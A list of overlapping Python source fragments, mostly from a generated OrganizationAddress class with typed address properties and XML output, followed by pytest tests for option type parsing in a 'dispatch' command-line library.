"is not None: line(\"PostalCode\", self.__postalCode) if self.__countryCode is not None: line(\"CountryCode\", self.__countryCode) if",
"of an organization. \"\"\" __addressTypeName: AddressTypeName __addressText: AddressText __supplementalAddressText: SupplementalAddressText __localityName: LocalityName __stateCode:",
"self.__localityName is not None: line(\"LocalityName\", self.__localityName) if self.__stateCode is not None: line(\"StateCode\", self.__stateCode)",
"= None if val is None else AddressText(val) @property def supplementalAddressText(self) -> SupplementalAddressText:",
"address of an organization. \"\"\" __addressTypeName: AddressTypeName __addressText: AddressText __supplementalAddressText: SupplementalAddressText __localityName: LocalityName",
"tag = doc.tag with tag(name): if self.__addressTypeName is not None: line(\"AddressTypeName\", self.__addressTypeName) if",
"class OrganizationAddress: \"\"\" The physical address of an organization. \"\"\" __addressTypeName: AddressTypeName __addressText:",
"str: doc = Doc() line = doc.line tag = doc.tag with tag(name): if",
"AddressText __supplementalAddressText: SupplementalAddressText __localityName: LocalityName __stateCode: StateCode __postalCode: PostalCode __countryCode: CountryCode __countyCode: CountyCode",
"def addressText(self) -> AddressText: return self.__addressText @addressText.setter def addressText(self, val: AddressText) -> None:",
"-> SupplementalAddressText: return self.__supplementalAddressText @supplementalAddressText.setter def supplementalAddressText(self, val: SupplementalAddressText) -> None: self.__supplementalAddressText =",
"None else CountryCode(val) @property def countyCode(self) -> CountyCode: return self.__countyCode @countyCode.setter def countyCode(self,",
"The physical address of an organization. \"\"\" __addressTypeName: AddressTypeName __addressText: AddressText __supplementalAddressText: SupplementalAddressText",
"None else CountyCode(val) def generateXML(self, name: str = \"OrganizationAddress\") -> str: doc =",
"= None if val is None else AddressTypeName(val) @property def addressText(self) -> AddressText:",
"__init__( self, o: dict = None, *, addressTypeName: AddressTypeName = None, addressText: AddressText",
"Doc() line = doc.line tag = doc.tag with tag(name): if self.__addressTypeName is not",
"-> str: doc = Doc() line = doc.line tag = doc.tag with tag(name):",
"else StateCode(val) @property def postalCode(self) -> PostalCode: return self.__postalCode @postalCode.setter def postalCode(self, val:",
"None: self.__countryCode = None if val is None else CountryCode(val) @property def countyCode(self)",
"None, postalCode: PostalCode = None, countryCode: CountryCode = None, countyCode: CountyCode = None",
"val: CountyCode) -> None: self.__countyCode = None if val is None else CountyCode(val)",
"CountryCode, CountyCode, LocalityName, PostalCode, StateCode, SupplementalAddressText, ) class OrganizationAddress: \"\"\" The physical address",
"= o.get(\"addressTypeName\") self.addressText = o.get(\"addressText\") self.supplementalAddressText = o.get(\"supplementalAddressText\") self.localityName = o.get(\"localityName\") self.stateCode =",
"addressTypeName(self, val: AddressTypeName) -> None: self.__addressTypeName = None if val is None else",
"= o.addressTypeName self.__addressText = o.addressText self.__supplementalAddressText = o.supplementalAddressText self.__localityName = o.localityName self.__stateCode =",
"supplementalAddressText(self, val: SupplementalAddressText) -> None: self.__supplementalAddressText = ( None if val is None",
"val is None else CountryCode(val) @property def countyCode(self) -> CountyCode: return self.__countyCode @countyCode.setter",
"CountryCode(val) @property def countyCode(self) -> CountyCode: return self.__countyCode @countyCode.setter def countyCode(self, val: CountyCode)",
"\"\"\" __addressTypeName: AddressTypeName __addressText: AddressText __supplementalAddressText: SupplementalAddressText __localityName: LocalityName __stateCode: StateCode __postalCode: PostalCode",
"if self.__countryCode is not None: line(\"CountryCode\", self.__countryCode) if self.__countyCode is not None: line(\"CountyCode\",",
"-> AddressText: return self.__addressText @addressText.setter def addressText(self, val: AddressText) -> None: self.__addressText =",
"= o.postalCode self.__countryCode = o.countryCode self.__countyCode = o.countyCode elif isinstance(o, dict): # Assign",
"@addressTypeName.setter def addressTypeName(self, val: AddressTypeName) -> None: self.__addressTypeName = None if val is",
"if self.__addressTypeName is not None: line(\"AddressTypeName\", self.__addressTypeName) if self.__addressText is not None: line(\"AddressText\",",
"CountryCode __countyCode: CountyCode def __init__( self, o: dict = None, *, addressTypeName: AddressTypeName",
"if val is None else AddressText(val) @property def supplementalAddressText(self) -> SupplementalAddressText: return self.__supplementalAddressText",
"def supplementalAddressText(self, val: SupplementalAddressText) -> None: self.__supplementalAddressText = ( None if val is",
"if self.__stateCode is not None: line(\"StateCode\", self.__stateCode) if self.__postalCode is not None: line(\"PostalCode\",",
"def localityName(self) -> LocalityName: return self.__localityName @localityName.setter def localityName(self, val: LocalityName) -> None:",
"None if val is None else StateCode(val) @property def postalCode(self) -> PostalCode: return",
"val: AddressTypeName) -> None: self.__addressTypeName = None if val is None else AddressTypeName(val)",
"o.stateCode self.__postalCode = o.postalCode self.__countryCode = o.countryCode self.__countyCode = o.countyCode elif isinstance(o, dict):",
"dict): # Assign attributes from dictionary with typechecking self.addressTypeName = o.get(\"addressTypeName\") self.addressText =",
"AddressText) -> None: self.__addressText = None if val is None else AddressText(val) @property",
"named keywords with typechecking self.addressTypeName = addressTypeName self.addressText = addressText self.supplementalAddressText = supplementalAddressText",
"countyCode(self) -> CountyCode: return self.__countyCode @countyCode.setter def countyCode(self, val: CountyCode) -> None: self.__countyCode",
"line(\"SupplementalAddressText\", self.__supplementalAddressText) if self.__localityName is not None: line(\"LocalityName\", self.__localityName) if self.__stateCode is not",
"= o.localityName self.__stateCode = o.stateCode self.__postalCode = o.postalCode self.__countryCode = o.countryCode self.__countyCode =",
"None if val is None else CountyCode(val) def generateXML(self, name: str = \"OrganizationAddress\")",
"not None: line(\"AddressText\", self.__addressText) if self.__supplementalAddressText is not None: line(\"SupplementalAddressText\", self.__supplementalAddressText) if self.__localityName",
"-> CountyCode: return self.__countyCode @countyCode.setter def countyCode(self, val: CountyCode) -> None: self.__countyCode =",
"= None if val is None else CountyCode(val) def generateXML(self, name: str =",
"\"OrganizationAddress\") -> str: doc = Doc() line = doc.line tag = doc.tag with",
"o.get(\"localityName\") self.stateCode = o.get(\"stateCode\") self.postalCode = o.get(\"postalCode\") self.countryCode = o.get(\"countryCode\") self.countyCode = o.get(\"countyCode\")",
"def localityName(self, val: LocalityName) -> None: self.__localityName = None if val is None",
"self.countyCode = o.get(\"countyCode\") else: # Assign attributes from named keywords with typechecking self.addressTypeName",
"isinstance(o, dict): # Assign attributes from dictionary with typechecking self.addressTypeName = o.get(\"addressTypeName\") self.addressText",
"SupplementalAddressText: return self.__supplementalAddressText @supplementalAddressText.setter def supplementalAddressText(self, val: SupplementalAddressText) -> None: self.__supplementalAddressText = (",
"-> None: self.__supplementalAddressText = ( None if val is None else SupplementalAddressText(val) )",
"CountryCode) -> None: self.__countryCode = None if val is None else CountryCode(val) @property",
"return self.__addressText @addressText.setter def addressText(self, val: AddressText) -> None: self.__addressText = None if",
"None, supplementalAddressText: SupplementalAddressText = None, localityName: LocalityName = None, stateCode: StateCode = None,",
"is None else SupplementalAddressText(val) ) @property def localityName(self) -> LocalityName: return self.__localityName @localityName.setter",
"else LocalityName(val) @property def stateCode(self) -> StateCode: return self.__stateCode @stateCode.setter def stateCode(self, val:",
"is None else PostalCode(val) @property def countryCode(self) -> CountryCode: return self.__countryCode @countryCode.setter def",
"@property def localityName(self) -> LocalityName: return self.__localityName @localityName.setter def localityName(self, val: LocalityName) ->",
"LocalityName: return self.__localityName @localityName.setter def localityName(self, val: LocalityName) -> None: self.__localityName = None",
"@countyCode.setter def countyCode(self, val: CountyCode) -> None: self.__countyCode = None if val is",
"val: PostalCode) -> None: self.__postalCode = None if val is None else PostalCode(val)",
"PostalCode __countryCode: CountryCode __countyCode: CountyCode def __init__( self, o: dict = None, *,",
"None else PostalCode(val) @property def countryCode(self) -> CountryCode: return self.__countryCode @countryCode.setter def countryCode(self,",
"o.countryCode self.__countyCode = o.countyCode elif isinstance(o, dict): # Assign attributes from dictionary with",
"-> None: self.__addressText = None if val is None else AddressText(val) @property def",
"self.__countyCode @countyCode.setter def countyCode(self, val: CountyCode) -> None: self.__countyCode = None if val",
"o.postalCode self.__countryCode = o.countryCode self.__countyCode = o.countyCode elif isinstance(o, dict): # Assign attributes",
"typechecking self.__addressTypeName = o.addressTypeName self.__addressText = o.addressText self.__supplementalAddressText = o.supplementalAddressText self.__localityName = o.localityName",
"o.localityName self.__stateCode = o.stateCode self.__postalCode = o.postalCode self.__countryCode = o.countryCode self.__countyCode = o.countyCode",
"if val is None else SupplementalAddressText(val) ) @property def localityName(self) -> LocalityName: return",
"-> StateCode: return self.__stateCode @stateCode.setter def stateCode(self, val: StateCode) -> None: self.__stateCode =",
"with typechecking self.addressTypeName = addressTypeName self.addressText = addressText self.supplementalAddressText = supplementalAddressText self.localityName =",
"None: self.__supplementalAddressText = ( None if val is None else SupplementalAddressText(val) ) @property",
"o.countyCode elif isinstance(o, dict): # Assign attributes from dictionary with typechecking self.addressTypeName =",
"None if val is None else PostalCode(val) @property def countryCode(self) -> CountryCode: return",
"= stateCode self.postalCode = postalCode self.countryCode = countryCode self.countyCode = countyCode @property def",
"self.__addressTypeName @addressTypeName.setter def addressTypeName(self, val: AddressTypeName) -> None: self.__addressTypeName = None if val",
"is not None: line(\"StateCode\", self.__stateCode) if self.__postalCode is not None: line(\"PostalCode\", self.__postalCode) if",
"val is None else CountyCode(val) def generateXML(self, name: str = \"OrganizationAddress\") -> str:",
"not None: line(\"LocalityName\", self.__localityName) if self.__stateCode is not None: line(\"StateCode\", self.__stateCode) if self.__postalCode",
"None else LocalityName(val) @property def stateCode(self) -> StateCode: return self.__stateCode @stateCode.setter def stateCode(self,",
"o.get(\"supplementalAddressText\") self.localityName = o.get(\"localityName\") self.stateCode = o.get(\"stateCode\") self.postalCode = o.get(\"postalCode\") self.countryCode = o.get(\"countryCode\")",
"self.__addressTypeName = o.addressTypeName self.__addressText = o.addressText self.__supplementalAddressText = o.supplementalAddressText self.__localityName = o.localityName self.__stateCode",
"if self.__postalCode is not None: line(\"PostalCode\", self.__postalCode) if self.__countryCode is not None: line(\"CountryCode\",",
"val: AddressText) -> None: self.__addressText = None if val is None else AddressText(val)",
"self.__supplementalAddressText = ( None if val is None else SupplementalAddressText(val) ) @property def",
"elif isinstance(o, dict): # Assign attributes from dictionary with typechecking self.addressTypeName = o.get(\"addressTypeName\")",
"val is None else PostalCode(val) @property def countryCode(self) -> CountryCode: return self.__countryCode @countryCode.setter",
"from dictionary with typechecking self.addressTypeName = o.get(\"addressTypeName\") self.addressText = o.get(\"addressText\") self.supplementalAddressText = o.get(\"supplementalAddressText\")",
"def supplementalAddressText(self) -> SupplementalAddressText: return self.__supplementalAddressText @supplementalAddressText.setter def supplementalAddressText(self, val: SupplementalAddressText) -> None:",
"-> None: self.__countyCode = None if val is None else CountyCode(val) def generateXML(self,",
"@property def postalCode(self) -> PostalCode: return self.__postalCode @postalCode.setter def postalCode(self, val: PostalCode) ->",
"= doc.tag with tag(name): if self.__addressTypeName is not None: line(\"AddressTypeName\", self.__addressTypeName) if self.__addressText",
"AddressTypeName __addressText: AddressText __supplementalAddressText: SupplementalAddressText __localityName: LocalityName __stateCode: StateCode __postalCode: PostalCode __countryCode: CountryCode",
"object without typechecking self.__addressTypeName = o.addressTypeName self.__addressText = o.addressText self.__supplementalAddressText = o.supplementalAddressText self.__localityName",
"localityName(self, val: LocalityName) -> None: self.__localityName = None if val is None else",
"None if val is None else AddressTypeName(val) @property def addressText(self) -> AddressText: return",
"= None ): if isinstance(o, OrganizationAddress): # Assign attributes from object without typechecking",
"StateCode) -> None: self.__stateCode = None if val is None else StateCode(val) @property",
"None, *, addressTypeName: AddressTypeName = None, addressText: AddressText = None, supplementalAddressText: SupplementalAddressText =",
"Assign attributes from object without typechecking self.__addressTypeName = o.addressTypeName self.__addressText = o.addressText self.__supplementalAddressText",
"None, countyCode: CountyCode = None ): if isinstance(o, OrganizationAddress): # Assign attributes from",
"countryCode(self, val: CountryCode) -> None: self.__countryCode = None if val is None else",
"postalCode(self) -> PostalCode: return self.__postalCode @postalCode.setter def postalCode(self, val: PostalCode) -> None: self.__postalCode",
"= o.get(\"stateCode\") self.postalCode = o.get(\"postalCode\") self.countryCode = o.get(\"countryCode\") self.countyCode = o.get(\"countyCode\") else: #",
"= None, addressText: AddressText = None, supplementalAddressText: SupplementalAddressText = None, localityName: LocalityName =",
"self.countryCode = o.get(\"countryCode\") self.countyCode = o.get(\"countyCode\") else: # Assign attributes from named keywords",
"organization. \"\"\" __addressTypeName: AddressTypeName __addressText: AddressText __supplementalAddressText: SupplementalAddressText __localityName: LocalityName __stateCode: StateCode __postalCode:",
"dict = None, *, addressTypeName: AddressTypeName = None, addressText: AddressText = None, supplementalAddressText:",
"None: line(\"PostalCode\", self.__postalCode) if self.__countryCode is not None: line(\"CountryCode\", self.__countryCode) if self.__countyCode is",
"\"\"\" The physical address of an organization. \"\"\" __addressTypeName: AddressTypeName __addressText: AddressText __supplementalAddressText:",
"self.__postalCode = o.postalCode self.__countryCode = o.countryCode self.__countyCode = o.countyCode elif isinstance(o, dict): #",
"is not None: line(\"AddressText\", self.__addressText) if self.__supplementalAddressText is not None: line(\"SupplementalAddressText\", self.__supplementalAddressText) if",
"from named keywords with typechecking self.addressTypeName = addressTypeName self.addressText = addressText self.supplementalAddressText =",
"CountryCode = None, countyCode: CountyCode = None ): if isinstance(o, OrganizationAddress): # Assign",
"self.__addressTypeName) if self.__addressText is not None: line(\"AddressText\", self.__addressText) if self.__supplementalAddressText is not None:",
"is not None: line(\"LocalityName\", self.__localityName) if self.__stateCode is not None: line(\"StateCode\", self.__stateCode) if",
"is not None: line(\"CountryCode\", self.__countryCode) if self.__countyCode is not None: line(\"CountyCode\", self.__countyCode) return",
"supplementalAddressText(self) -> SupplementalAddressText: return self.__supplementalAddressText @supplementalAddressText.setter def supplementalAddressText(self, val: SupplementalAddressText) -> None: self.__supplementalAddressText",
"None: self.__localityName = None if val is None else LocalityName(val) @property def stateCode(self)",
"-> AddressTypeName: return self.__addressTypeName @addressTypeName.setter def addressTypeName(self, val: AddressTypeName) -> None: self.__addressTypeName =",
"None if val is None else SupplementalAddressText(val) ) @property def localityName(self) -> LocalityName:",
"Assign attributes from dictionary with typechecking self.addressTypeName = o.get(\"addressTypeName\") self.addressText = o.get(\"addressText\") self.supplementalAddressText",
"SupplementalAddressText = None, localityName: LocalityName = None, stateCode: StateCode = None, postalCode: PostalCode",
"None: self.__postalCode = None if val is None else PostalCode(val) @property def countryCode(self)",
"line(\"PostalCode\", self.__postalCode) if self.__countryCode is not None: line(\"CountryCode\", self.__countryCode) if self.__countyCode is not",
"-> PostalCode: return self.__postalCode @postalCode.setter def postalCode(self, val: PostalCode) -> None: self.__postalCode =",
"o.supplementalAddressText self.__localityName = o.localityName self.__stateCode = o.stateCode self.__postalCode = o.postalCode self.__countryCode = o.countryCode",
"def countryCode(self) -> CountryCode: return self.__countryCode @countryCode.setter def countryCode(self, val: CountryCode) -> None:",
"None, localityName: LocalityName = None, stateCode: StateCode = None, postalCode: PostalCode = None,",
"if val is None else PostalCode(val) @property def countryCode(self) -> CountryCode: return self.__countryCode",
"postalCode(self, val: PostalCode) -> None: self.__postalCode = None if val is None else",
"__supplementalAddressText: SupplementalAddressText __localityName: LocalityName __stateCode: StateCode __postalCode: PostalCode __countryCode: CountryCode __countyCode: CountyCode def",
"__postalCode: PostalCode __countryCode: CountryCode __countyCode: CountyCode def __init__( self, o: dict = None,",
"self.countryCode = countryCode self.countyCode = countyCode @property def addressTypeName(self) -> AddressTypeName: return self.__addressTypeName",
"supplementalAddressText self.localityName = localityName self.stateCode = stateCode self.postalCode = postalCode self.countryCode = countryCode",
"None: line(\"StateCode\", self.__stateCode) if self.__postalCode is not None: line(\"PostalCode\", self.__postalCode) if self.__countryCode is",
"countyCode @property def addressTypeName(self) -> AddressTypeName: return self.__addressTypeName @addressTypeName.setter def addressTypeName(self, val: AddressTypeName)",
"self.countyCode = countyCode @property def addressTypeName(self) -> AddressTypeName: return self.__addressTypeName @addressTypeName.setter def addressTypeName(self,",
"yattag import Doc from .SimpleContent import ( AddressText, AddressTypeName, CountryCode, CountyCode, LocalityName, PostalCode,",
".SimpleContent import ( AddressText, AddressTypeName, CountryCode, CountyCode, LocalityName, PostalCode, StateCode, SupplementalAddressText, ) class",
"val is None else StateCode(val) @property def postalCode(self) -> PostalCode: return self.__postalCode @postalCode.setter",
"@supplementalAddressText.setter def supplementalAddressText(self, val: SupplementalAddressText) -> None: self.__supplementalAddressText = ( None if val",
") class OrganizationAddress: \"\"\" The physical address of an organization. \"\"\" __addressTypeName: AddressTypeName",
"o.get(\"postalCode\") self.countryCode = o.get(\"countryCode\") self.countyCode = o.get(\"countyCode\") else: # Assign attributes from named",
"self.__countryCode = o.countryCode self.__countyCode = o.countyCode elif isinstance(o, dict): # Assign attributes from",
"self.addressTypeName = addressTypeName self.addressText = addressText self.supplementalAddressText = supplementalAddressText self.localityName = localityName self.stateCode",
"None if val is None else CountryCode(val) @property def countyCode(self) -> CountyCode: return",
"self.__postalCode @postalCode.setter def postalCode(self, val: PostalCode) -> None: self.__postalCode = None if val",
"self.__countryCode = None if val is None else CountryCode(val) @property def countyCode(self) ->",
"PostalCode) -> None: self.__postalCode = None if val is None else PostalCode(val) @property",
"is None else LocalityName(val) @property def stateCode(self) -> StateCode: return self.__stateCode @stateCode.setter def",
"with tag(name): if self.__addressTypeName is not None: line(\"AddressTypeName\", self.__addressTypeName) if self.__addressText is not",
"@addressText.setter def addressText(self, val: AddressText) -> None: self.__addressText = None if val is",
"CountyCode def __init__( self, o: dict = None, *, addressTypeName: AddressTypeName = None,",
"with typechecking self.addressTypeName = o.get(\"addressTypeName\") self.addressText = o.get(\"addressText\") self.supplementalAddressText = o.get(\"supplementalAddressText\") self.localityName =",
"None, countryCode: CountryCode = None, countyCode: CountyCode = None ): if isinstance(o, OrganizationAddress):",
"OrganizationAddress): # Assign attributes from object without typechecking self.__addressTypeName = o.addressTypeName self.__addressText =",
"None: line(\"SupplementalAddressText\", self.__supplementalAddressText) if self.__localityName is not None: line(\"LocalityName\", self.__localityName) if self.__stateCode is",
"__stateCode: StateCode __postalCode: PostalCode __countryCode: CountryCode __countyCode: CountyCode def __init__( self, o: dict",
"self.__supplementalAddressText) if self.__localityName is not None: line(\"LocalityName\", self.__localityName) if self.__stateCode is not None:",
"Assign attributes from named keywords with typechecking self.addressTypeName = addressTypeName self.addressText = addressText",
"def generateXML(self, name: str = \"OrganizationAddress\") -> str: doc = Doc() line =",
"-> None: self.__addressTypeName = None if val is None else AddressTypeName(val) @property def",
"else AddressText(val) @property def supplementalAddressText(self) -> SupplementalAddressText: return self.__supplementalAddressText @supplementalAddressText.setter def supplementalAddressText(self, val:",
"= None if val is None else StateCode(val) @property def postalCode(self) -> PostalCode:",
"if val is None else AddressTypeName(val) @property def addressText(self) -> AddressText: return self.__addressText",
"= o.get(\"countryCode\") self.countyCode = o.get(\"countyCode\") else: # Assign attributes from named keywords with",
"= countyCode @property def addressTypeName(self) -> AddressTypeName: return self.__addressTypeName @addressTypeName.setter def addressTypeName(self, val:",
"self, o: dict = None, *, addressTypeName: AddressTypeName = None, addressText: AddressText =",
"self.stateCode = stateCode self.postalCode = postalCode self.countryCode = countryCode self.countyCode = countyCode @property",
"__addressTypeName: AddressTypeName __addressText: AddressText __supplementalAddressText: SupplementalAddressText __localityName: LocalityName __stateCode: StateCode __postalCode: PostalCode __countryCode:",
"def stateCode(self) -> StateCode: return self.__stateCode @stateCode.setter def stateCode(self, val: StateCode) -> None:",
"= None, countyCode: CountyCode = None ): if isinstance(o, OrganizationAddress): # Assign attributes",
"AddressText(val) @property def supplementalAddressText(self) -> SupplementalAddressText: return self.__supplementalAddressText @supplementalAddressText.setter def supplementalAddressText(self, val: SupplementalAddressText)",
"def postalCode(self, val: PostalCode) -> None: self.__postalCode = None if val is None",
"self.__supplementalAddressText @supplementalAddressText.setter def supplementalAddressText(self, val: SupplementalAddressText) -> None: self.__supplementalAddressText = ( None if",
"CountyCode(val) def generateXML(self, name: str = \"OrganizationAddress\") -> str: doc = Doc() line",
"countryCode(self) -> CountryCode: return self.__countryCode @countryCode.setter def countryCode(self, val: CountryCode) -> None: self.__countryCode",
"__localityName: LocalityName __stateCode: StateCode __postalCode: PostalCode __countryCode: CountryCode __countyCode: CountyCode def __init__( self,",
"postalCode: PostalCode = None, countryCode: CountryCode = None, countyCode: CountyCode = None ):",
"is not None: line(\"AddressTypeName\", self.__addressTypeName) if self.__addressText is not None: line(\"AddressText\", self.__addressText) if",
"val is None else LocalityName(val) @property def stateCode(self) -> StateCode: return self.__stateCode @stateCode.setter",
"= o.addressText self.__supplementalAddressText = o.supplementalAddressText self.__localityName = o.localityName self.__stateCode = o.stateCode self.__postalCode =",
"def countyCode(self) -> CountyCode: return self.__countyCode @countyCode.setter def countyCode(self, val: CountyCode) -> None:",
"= localityName self.stateCode = stateCode self.postalCode = postalCode self.countryCode = countryCode self.countyCode =",
"stateCode(self, val: StateCode) -> None: self.__stateCode = None if val is None else",
"self.__supplementalAddressText = o.supplementalAddressText self.__localityName = o.localityName self.__stateCode = o.stateCode self.__postalCode = o.postalCode self.__countryCode",
"localityName self.stateCode = stateCode self.postalCode = postalCode self.countryCode = countryCode self.countyCode = countyCode",
"typechecking self.addressTypeName = addressTypeName self.addressText = addressText self.supplementalAddressText = supplementalAddressText self.localityName = localityName",
"stateCode(self) -> StateCode: return self.__stateCode @stateCode.setter def stateCode(self, val: StateCode) -> None: self.__stateCode",
"countryCode: CountryCode = None, countyCode: CountyCode = None ): if isinstance(o, OrganizationAddress): #",
"@property def supplementalAddressText(self) -> SupplementalAddressText: return self.__supplementalAddressText @supplementalAddressText.setter def supplementalAddressText(self, val: SupplementalAddressText) ->",
"= None if val is None else PostalCode(val) @property def countryCode(self) -> CountryCode:",
"self.__addressText = o.addressText self.__supplementalAddressText = o.supplementalAddressText self.__localityName = o.localityName self.__stateCode = o.stateCode self.__postalCode",
"self.addressTypeName = o.get(\"addressTypeName\") self.addressText = o.get(\"addressText\") self.supplementalAddressText = o.get(\"supplementalAddressText\") self.localityName = o.get(\"localityName\") self.stateCode",
"AddressTypeName, CountryCode, CountyCode, LocalityName, PostalCode, StateCode, SupplementalAddressText, ) class OrganizationAddress: \"\"\" The physical",
"dictionary with typechecking self.addressTypeName = o.get(\"addressTypeName\") self.addressText = o.get(\"addressText\") self.supplementalAddressText = o.get(\"supplementalAddressText\") self.localityName",
"return self.__postalCode @postalCode.setter def postalCode(self, val: PostalCode) -> None: self.__postalCode = None if",
"): if isinstance(o, OrganizationAddress): # Assign attributes from object without typechecking self.__addressTypeName =",
"CountyCode, LocalityName, PostalCode, StateCode, SupplementalAddressText, ) class OrganizationAddress: \"\"\" The physical address of",
"self.addressText = o.get(\"addressText\") self.supplementalAddressText = o.get(\"supplementalAddressText\") self.localityName = o.get(\"localityName\") self.stateCode = o.get(\"stateCode\") self.postalCode",
"def postalCode(self) -> PostalCode: return self.__postalCode @postalCode.setter def postalCode(self, val: PostalCode) -> None:",
"self.__countyCode = None if val is None else CountyCode(val) def generateXML(self, name: str",
"= \"OrganizationAddress\") -> str: doc = Doc() line = doc.line tag = doc.tag",
"else SupplementalAddressText(val) ) @property def localityName(self) -> LocalityName: return self.__localityName @localityName.setter def localityName(self,",
"= None if val is None else LocalityName(val) @property def stateCode(self) -> StateCode:",
"@postalCode.setter def postalCode(self, val: PostalCode) -> None: self.__postalCode = None if val is",
"return self.__addressTypeName @addressTypeName.setter def addressTypeName(self, val: AddressTypeName) -> None: self.__addressTypeName = None if",
"None: line(\"AddressText\", self.__addressText) if self.__supplementalAddressText is not None: line(\"SupplementalAddressText\", self.__supplementalAddressText) if self.__localityName is",
"SupplementalAddressText, ) class OrganizationAddress: \"\"\" The physical address of an organization. \"\"\" __addressTypeName:"
] |
[
"o.value.items(): assert isinstance(k, str) assert isinstance(v, int) opt = Option('num', complex) opt.setval('5+9j') assert",
"sys from os.path import dirname sys.path.insert(0, dirname(dirname(__file__))) from typing import List, Set, Dict,",
"import sys from os.path import dirname sys.path.insert(0, dirname(dirname(__file__))) from typing import List, Set,",
"got == want o = Option('o', Dict[str, int]) o.setval('{one:1,two:2,three:3}') assert isinstance(o.value, dict) for",
"import dirname sys.path.insert(0, dirname(dirname(__file__))) from typing import List, Set, Dict, Sequence, Mapping from",
"Mapping from dispatch import command from dispatch.flags import Option, _from_typing_module, _is_iterable class AType:",
"assert got == want assert got == want o = Option('o', Dict[str, int])",
"4]): assert isinstance(got, str) assert isinstance(want, int) assert int(got) == want assert got",
"Option('o', Dict[str, int]) o.setval('{one:1,two:2,three:3}') assert isinstance(o.value, dict) for k, v in o.value.items(): assert",
"opt = Option('type', AType) opt.setval('hello') assert isinstance(opt.value, AType) assert opt.value.val == 'hello' def",
"dict) for k, v in o.value.items(): assert isinstance(k, str) assert isinstance(v, int) opt",
"float]) opt = Option('num', complex) @command def f(keys: Dict[str, float]): pass with raises(ValueError):",
"got == want assert got == want o = Option('o', Dict[str, int]) o.setval('{one:1,two:2,three:3}')",
"import command from dispatch.flags import Option, _from_typing_module, _is_iterable class AType: def __init__(self, val):",
"assert got == want o = Option('o', list) o.setval('[1,2,3,4]') assert isinstance(o.value, list) for",
"Option('num', complex) @command def f(keys: Dict[str, float]): pass with raises(ValueError): o.setval('{one:1.0,two:2.5,three:the third number,four:4}')",
"assert _is_iterable(set) assert _is_iterable(List) assert _is_iterable(Dict) assert _is_iterable(Sequence) assert _is_iterable(Mapping) class A: pass",
"[1, 2, 3, 4]): assert isinstance(got, int) assert isinstance(want, int) assert got ==",
"opt.setval(6.7) assert opt.value == complex(6.7, 0) opt = Option('type', AType) opt.setval('hello') assert isinstance(opt.value,",
"in zip(o.value, [1.5, 2.6, 3.7, 4.8]): assert isinstance(got, float) assert isinstance(want, float) assert",
"opt.setval('4+3i') f(['--keys', '{one:1,two:this is the number two}']) def testIsIterable(): assert _is_iterable(str) assert _is_iterable(list)",
"assert not _from_typing_module(int) assert not _from_typing_module(dict) class A: pass # noqa assert not",
"opt.setval('hello') assert isinstance(opt.value, AType) assert opt.value.val == 'hello' def testBadTypeParsing(): o = Option('outout',",
"from dispatch import command from dispatch.flags import Option, _from_typing_module, _is_iterable class AType: def",
"isinstance(want, int) assert got == want o = Option('o', list) o.setval('[1,2,3,4]') assert isinstance(o.value,",
"str) assert isinstance(want, int) assert int(got) == want assert got == str(want) o",
"str) assert isinstance(v, int) opt = Option('num', complex) opt.setval('5+9j') assert opt.value == complex(5,",
"Option('num', complex) opt.setval('5+9j') assert opt.value == complex(5, 9) opt.setval(complex(7, 2)) assert opt.value ==",
"_is_iterable(A) assert _is_iterable([1, 2, 3]) def testFromTypingModule(): assert _from_typing_module(List) assert _from_typing_module(Sequence) assert _from_typing_module(Dict[int,",
"testFromTypingModule(): assert _from_typing_module(List) assert _from_typing_module(Sequence) assert _from_typing_module(Dict[int, str]) assert not _from_typing_module(list) assert not",
"isinstance(opt.value, AType) assert opt.value.val == 'hello' def testBadTypeParsing(): o = Option('outout', Dict[str, float])",
"_from_typing_module(Dict[int, str]) assert not _from_typing_module(list) assert not _from_typing_module(int) assert not _from_typing_module(dict) class A:",
"# noqa assert not _is_iterable(int) assert not _is_iterable(float) assert not _is_iterable(A) assert _is_iterable([1,",
"== want o = Option('o', list) o.setval('[1,2,3,4]') assert isinstance(o.value, list) for got, want",
"opt = Option('num', complex) opt.setval('5+9j') assert opt.value == complex(5, 9) opt.setval(complex(7, 2)) assert",
"_is_iterable([1, 2, 3]) def testFromTypingModule(): assert _from_typing_module(List) assert _from_typing_module(Sequence) assert _from_typing_module(Dict[int, str]) assert",
"dirname sys.path.insert(0, dirname(dirname(__file__))) from typing import List, Set, Dict, Sequence, Mapping from dispatch",
"4]): assert isinstance(got, int) assert isinstance(want, int) assert got == want o =",
"want in zip(o.value, [1, 2, 3, 4]): assert isinstance(got, str) assert isinstance(want, int)",
"Dict[str, float]) opt = Option('num', complex) @command def f(keys: Dict[str, float]): pass with",
"_from_typing_module, _is_iterable class AType: def __init__(self, val): self.val = val def testTypeParsing(): o",
"val): self.val = val def testTypeParsing(): o = Option('o', List[int]) o.setval('[1,2,3,4]') assert isinstance(o.value,",
"opt.value == complex(6.7, 0) opt = Option('type', AType) opt.setval('hello') assert isinstance(opt.value, AType) assert",
"number two}']) def testIsIterable(): assert _is_iterable(str) assert _is_iterable(list) assert _is_iterable(dict) assert _is_iterable(set) assert",
"pytest import raises import sys from os.path import dirname sys.path.insert(0, dirname(dirname(__file__))) from typing",
"= Option('o', list) o.setval('[1,2,3,4]') assert isinstance(o.value, list) for got, want in zip(o.value, [1,",
"pytest from pytest import raises import sys from os.path import dirname sys.path.insert(0, dirname(dirname(__file__)))",
"want o = Option('o', Dict[str, int]) o.setval('{one:1,two:2,three:3}') assert isinstance(o.value, dict) for k, v",
"for got, want in zip(o.value, [1, 2, 3, 4]): assert isinstance(got, int) assert",
"complex) opt.setval('5+9j') assert opt.value == complex(5, 9) opt.setval(complex(7, 2)) assert opt.value == complex(7,",
"isinstance(got, int) assert isinstance(want, int) assert got == want o = Option('o', list)",
"_is_iterable(dict) assert _is_iterable(set) assert _is_iterable(List) assert _is_iterable(Dict) assert _is_iterable(Sequence) assert _is_iterable(Mapping) class A:",
"Option('outout', Dict[str, float]) opt = Option('num', complex) @command def f(keys: Dict[str, float]): pass",
"opt.value == complex(5, 9) opt.setval(complex(7, 2)) assert opt.value == complex(7, 2) opt.setval(6.7) assert",
"__init__(self, val): self.val = val def testTypeParsing(): o = Option('o', List[int]) o.setval('[1,2,3,4]') assert",
"isinstance(want, int) assert int(got) == want assert got == str(want) o = Option('o',",
"def f(keys: Dict[str, float]): pass with raises(ValueError): o.setval('{one:1.0,two:2.5,three:the third number,four:4}') opt.setval('4+3i') f(['--keys', '{one:1,two:this",
